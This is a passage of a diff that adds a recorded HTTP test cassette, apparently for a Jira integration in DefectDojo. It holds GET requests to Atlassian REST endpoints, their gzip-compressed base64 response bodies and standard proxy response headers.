5U4FNleBBQ0C+wi3sxf49hWQ5QYzQZsDtNwVWb0tm6reVN97GWC5s58HsTU7eosY4c2PwKty+6Dh + 8DZbq7QtbjAXvMDkc1dkdTt4Cctvzbpjg1oicE0AJYsncyAfM5P620S8drCzhIILZ7Qgbc7HqZeK + OrEATVQqphgviBwpFmcyV7nA1CJ2xta3Kxl9vpGr8w3QcJjtiReKZDYX3DDrkBwmsnEe3q/LWgae + kE9XQJ/s4sAnc5KibYv1Z8nu+1MRwv1AZWec14nfI8Sn/NUfU0EsxkA3BinJkJLjCdOiaTHv35/F + fw1ApLRTFkWOVz9M6twLNPwwDVTazgxH/vSJSm3nOlYwG1O9yopbHzAyarNdWRb0Ryd+7V6HXqAX + 1aUQOmcSBCmP5axJNQ0XO+GfQKwhv3aV4wV68FNOhBi98yZF30WTBmdLgV+1hSWDICLw0K8yJ7ou + fvFEB49SBnFLk2dAfouQWGPqqmkh/TExIsDEXoJEz+vSovLupKzi5+KNhYZcN1X/lw1PSNKERvwc + hHpSFz8sKRkSRtqAvVJvvirlCxrMbDl8iVY1vsuEjrthBnO1WSB8qSsJEIEWETumhUVGtsu2+9Z8 + wA8+9tlodN+rseWs3/22roXqJHCuksCgQVhfTVHKeKLmbCD/AAAA//8iMiDBQ79QO0BUNIjAXgvh + Dc4SoLZiq6JcXTADdf0LSAgjxHCPAhvgHAUGy0BDzL8oPTEvswocRTjGgdGV0CoMwSPBqJZhDT/0 + pZOI6Yh8JM24wxh5PgJJsy6SbgAAAAD//8RcwQ6CMAz9FY56MOEXjHow8eBFL8YDCYSYCCMi3Ph3 + 2WjXjbVqCMYbXYG+92pYV4YOTxRabhvHYtvYeEDoddU/O/TmBV5k1z27wO7N7fHl1AsRHU1rKlqY + rfR9NRXpZ3m91KmAtEi7dUdpgDlA0PybwspA0Lfh22Wx3ISOxSa08UAG9kWVmEUpI7/1za49qGja + zzbKcPC/hbjTos7K9vZQpbcY9MdAvp03iJjCyXiqUG5QTo6wdHWvIEJp4/9FB9lAZNtk4+XLfCxS + swEAY3I8ILRlgecSg6BECiuj35ZFFJAjwBVIXF2kCu9HRTZw2NgBmUKQBjjlYx4wGkcAfPWqSnIv + FXgRkWjVM6M8oAUEzmDK8KdnYAjFoUcQFvUwQJj1R7Z3Re+byAbcB5VH+svgt9CnKs9BHs8VhMiS + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - b894a3c75fb556d1 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:32 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 4edbcbae-67ae-42ef-9a2d-2fc2fe18f146 + x-envoy-upstream-service-time: + - '65' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 19a959f477f3958a + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:32 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - c68cc3c1-274c-4e3b-b929-1d3f086e8439 + x-envoy-upstream-service-time: + - '66' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/latest/issue/NTEST-465 + response: + body: + string: !!binary | + H4sIAAAAAAAAA6RWbVPbOBD+Kxp/6NxxSWwnKQ2e6dxQSHvcUcokocwUOhnF3jhqbMkjyXFyLf/9 + VpJNKDRcoeED1kr7/uwjffVgXVCeeJEngScgIXnLIEtUi9McVEvFC8hpSxQgqWaCqxYkTOegaSte + UJ5CJtLWCqTCPUhGUEhQwLU767U8ZiyHwX74ChcKsjkuF1oXKvL9BOYQ60R8ER2qM6oUo7zDQfto + Q/u0YH5GtflkSpXgN1aWsEEjZ5PheNLu779EydxG7EVfPYWeSxWjWirkxkWY4AoVukE3bAe9dhBO + ukHUfxl19zsHB70/gjAITKDGh94UYM08NdCui9HoY5xB0N2m7hYJqFiywpQFpYdE5TTLWiRhSjMe + a1IwiIGIOamEXHaMdiz4hcx+JgoFcSnBXzGo6IpqKv9U7F94nWOnyvyFE50kr8OgFw7q5QQDfb1N + ueWZbqOvCVVL06hyps1XNKeZgpbX2PAia+Sm5WmG6Ciw017ES8zEK6T4guE9s3q1tq2d7UZTO7O4 + 0/BtpBecaQMOA7Ja2yT1jz2rxFxXVJrEFMuLjCFCknvZYHEtZPqDdX/wM+HWZa6d1ZUumCks/u7W + uR8YnHb7627/2YZtCy1KXqj6/yO+wv11uP9rvtaNs/rjEW+97rrX/TVvNThV87HT282Nme/1R0cx + 2LGrz9jBNJWQ4lw/gCFiSmSlGzMniUulRW4pYooeuq92bQwe2nDU4aRmMC0HelE7xCXVSI2OdJ6O + d8dotxzmO2vSgNl+HonS5BQaXro0AsZTL9KyhJuaqowxyWKX6dcHMhMYHlULUWbJMVNFRjf1AKAY + o9IfkS7MUNTFkIC5mqn7EU++6ocNT96vWrCrnOGuje6ujd6WS5iQTG+eWdxG3e8/jUdZTlNQvtFQ + jRGGgkxUHbVKt9xzKqqGo/qeLecMDJkYaN5LykzlD7MNd+EwHJi0F1QNCxafMr609/ExFOZ65nHT + Rdvbyu7dSrjgQ7yd6SyDEVDlkCHrL+/89OLdydn09ORoeDYeToej0YcRpoEDpDBvPDBZADlH1uSa + GL+EKSJ4tiE4kSwzRokW5G8mKTmXkOPUklIhZjt2Ru9ncYAGg28sCHqUR567MLBFWOPtSH03xljt + lHGa3T9UPy7q8lqcZxhdwwTYvpTD7emyMDP7Ezh2L4VnIswp395W31/uTwPdFlVvaLzE11SDrMa4 + 83VUP2l+KeDmXeQ3z5Nuc7lyMIiORSbkmYtmlpXQTiWyxvZxIMixcM0WeYHvPa7rLjzWv++Lc823 + f3sTpjPYi8jVJ1qEETkSYsmAXDKNrKXJ2F4e5G1G028mV0w1EzHNFkLpaBAMAn/OeILE6PcOws/W + 4LEtBUb5RRADkmiP/K+mVRwDwgwpAxVwuImVHV0OcXnBl1xU25iPPj6Q7p1LkZT4ehnyFCcpx7r4 + EywDnruySaBh8peo2lrsSKSoDXQ/E59cVQBLHDu4tbZDa3vA71nFT4fnZBxTvuO8fUuHYd/V6o2k + PF74E5pinGfYTSctWZacHN8VHYk8Z5ogIy3uiscbpSFXmHRSCIZQwEbiz+7Zqhts5pRxxTR0EDFR + v9/btbdL7ifodSaoTOr+3mJpL7rmhyR2kMHYyAyAEwWaVDV+NNKZe4CQOWKoRaoFixckB8oVblJ3 + oraAVUMLhMYx0iEkZMUoKRHhsdwUyCd4jHNwN2vHhDJCpCFTxhA1CKuqqiMqqoqOkKmP+IJ1p1gU + FgkItelcyKlzpqZU4z09K7Eh098+XB6Oz9vj9228AX83pi9Gp87oY8V4D5hkEpF3w8k1R9LGCdUg + IyKKVXzNhytm7goMbgy67eaq2bvr4D8AAAD//+xZbWvbMBD+KyZQaEft2E6cl8HowtbBPmyUFTbo + N8VWG7P4BctON7L89z4nyarrxNkIo+RDIAQlku8up7vnnrscoCBK4qhLgdrbo6BbLJ1YxXgXykdd + KrbPycD4gkr9IJtOiosfC55SQlvMXG+GnhR2ICDImHjFrTjFjSTyGSsrqNgx7AqqNahzP3l6SfGR + Wgh9xaIstnxkvynQrJzJIKkELtZC5DTiBC1nypeOdZ0KijwTZ41IJF0UqNCv7RO1gSRPVIjSnXbK + yHvzOclZWNLv/JpZsfxgAUDIXSpLbkueC6rVBVfAwtVhnbgmdAV9DZSzR94QTpvdfrC9gXZoE0kl + HNRIiRY/K+jKAG7nDDeeXljnF39wy8syewto2eaIXhdH9Ib1BhWQskABlDyXmGv7aNAhw+3cMMxL + ul7Syd0Hu5iYazoC5CsLF4S0O/qPdsFrS5kaO6okYVTCe3+rd+RDIuRZcWC9J2J2BTCjNgKtVHDP + hoPIm0+GbjCHTePx1PP9EdELcwga9hzjdMGzKIIO1Pzesw22bu7eG+wjoXs7bJUKDsiFPCaRRy37 + ged7Q+65fOBH01E4CIOxF06CKHLZ6N7jk6vonZRyNpid+Z/wUs/ZCUt1KbRt9ZVwKmE/wiO271AW + OHk1X8YhuczOGRPkMTyPlCtjsGcsP97YIydPyf526378FrcHAMdvcXuIcOwWA5Mi1UdrhtyEyBs9 + /aJ8ItRWvbrCtTsAL45fV0WW8/4doChcPCceDa2wazKZ9OjxmybXhUbcExS8/qWfoOA1LD5BQScU + GKYBEx9Uxq1p3q3XLuRmJVtitc2ZXPCu3nrT297oms25XbM518zm2huGwvF0FRdZqkiSbv0r/eeL + +vhPPwHNppSwrpcaBQ9AvsbfRv1a7mUvYb++cVEtSXBDtxy0FOWsVHassvK/DXeVLCMTqtCvfs/k + mKqeyNJ0mYY/pNHY8dJY/4W1+gHpnc1m8wQAAP//AwCZu5INyBsAAA== + headers: + ATL-TraceId: + - 14af3a17147227e1 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:32 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 109131f4-ffb4-420c-bdcb-f4f84f33b2fe + x-envoy-upstream-service-time: + - '137' + status: + code: 200 + message: OK +version: 1